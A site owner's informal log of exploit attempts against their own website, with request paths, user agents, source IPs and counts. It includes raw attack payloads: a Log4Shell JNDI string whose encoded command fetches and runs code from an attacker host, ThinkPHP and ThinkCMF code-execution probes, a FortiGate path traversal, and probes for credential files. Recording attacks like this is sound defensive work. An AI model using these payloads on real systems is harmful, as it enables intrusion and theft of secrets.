This was a start of a listing of Exploit Attempts to this Website, an attempt to list and count the exploits and to name names...*

Some exploit attempts to the same URL vary the UA and IP, which get put into one entry with a "*" for UA and/or IP to indicate that. Though I still do not track the counts yet.

Also, some requests, like /.env, get simple "variations", such as /public/.env, /storage/.env, etc.

For encoded URLs the title attribute string is decoded (so you can tell what they are really asking for).

Update: The list is no longer in reverse order by date. It is now just a jumble of random shit... And I get all bloggy at the end.
Request User Agent IP Address Last Seen Qty
GET /favicon.ico masscan-ng/1.3 (https://github.com/bi-zone/masscan-ng) 109.248.6.72 23/Aug/2022 12
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts Lkx-TraversalHttpPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis) 167.71.13.196 03/Dec/2021 1
GET /.DS_Store Go-http-client/1.1 167.71.13.196 03/Dec/2021 1
GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application l9explore/1.3.0 167.71.13.196 03/Dec/2021 1
GET /frontend_dev.php/$ l9explore/1.3.0 167.71.13.196 03/Dec/2021 1
GET /v2/_catalog l9explore/1.3.0 167.71.13.196 03/Dec/2021 1
GET /api/search?folderIds=0 l9explore/1.3.0 167.71.13.196 03/Dec/2021 1
GET /server-status l9explore/1.3.0 167.71.13.196 03/Dec/2021 1
GET /api/geojson?url=file:///etc/hosts l9explore/1.3.0 167.71.13.196 03/Dec/2021 1
GET /login.action l9explore/1.3.0 167.71.13.196 03/Dec/2021 1
GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 45.146.165.37 31/Jan/2022 1
GET /solr/admin/info/system?wt=json Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 45.146.165.37 31/Jan/2022 1
GET /elfinder/elfinder.html ALittle Client 194.38.20.161 31/Jan/2022 1
GET /.aws/credentials Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 35.88.97.197 15/Jan/2022 1
GET /phpinfo Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 35.88.97.197 15/Jan/2022 1
GET /phpinfo.php Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 35.88.97.197 15/Jan/2022 1
GET /info.php Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 35.88.97.197 15/Jan/2022 1
GET /config/aws.yml Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 35.88.97.197 15/Jan/2022 1
GET /_profiler/phpinfo Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 35.88.97.197 15/Jan/2022 1
POST /cgi-bin/index2.asp Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.44 193.3.19.72 16/Jan/2022 1
GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application Mozilla/5.0 zgrab/0.x 192.241.213.120* 13/Jan/2022 46
GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f Mozilla/5.0 zgrab/0.x 192.241.196.120 13/Jan/2022 26
GET /owa/auth/logon.aspx Mozilla/5.0 zgrab/0.x 192.241.208.61* 08/Jan/2022 51
GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36* 45.146.165.37* 13/Jan/2022 92
GET /.env Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0* 161.97.84.43* 02/Jan/2022 384
GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php python-requests/2.25.1* 45.146.165.37* 13/Jan/2022 125
GET /wp-admin/css/ Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 45.144.225.241 07/Jan/2022 1
CONNECT accountws.arin.net:443 Go-http-client/1.1 158.69.138.27 11/Jan/2022 1
GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 45.146.165.37 11/Jan/2022 5
GET /actuator/health Mozilla/5.0 zgrab/0.x 192.241.212.72 31/Dec/2021 3
GET ///remote/fgt_lang?lang=/../../../..//////////dev/ python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.45.1.el7.x86_64 45.134.144.108 31/Dec/2021 2
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession Python-urllib/3.9 116.14.110.40* 13/Jan/2022 12
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0 - github.com/anasbousselham/) 45.11.180.148 11/Jan/2022 1
GET /user/login?redirect=%2F curl/7.64.1 194.48.199.78 31/Dec/2021 1
GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTUuMTIwLjEzOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTUuMTIwLjEzOjQ0Myl8YmFzaA==} ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTUuMTIwLjEzOjQ0M3x8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTUuMTIwLjEzOjQ0Myl8YmFzaA==} 195.54.160.149 31/Dec/2021 1
GET /?XDEBUG_SESSION_START=phpstorm Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 195.54.160.149 31/Dec/2021 200+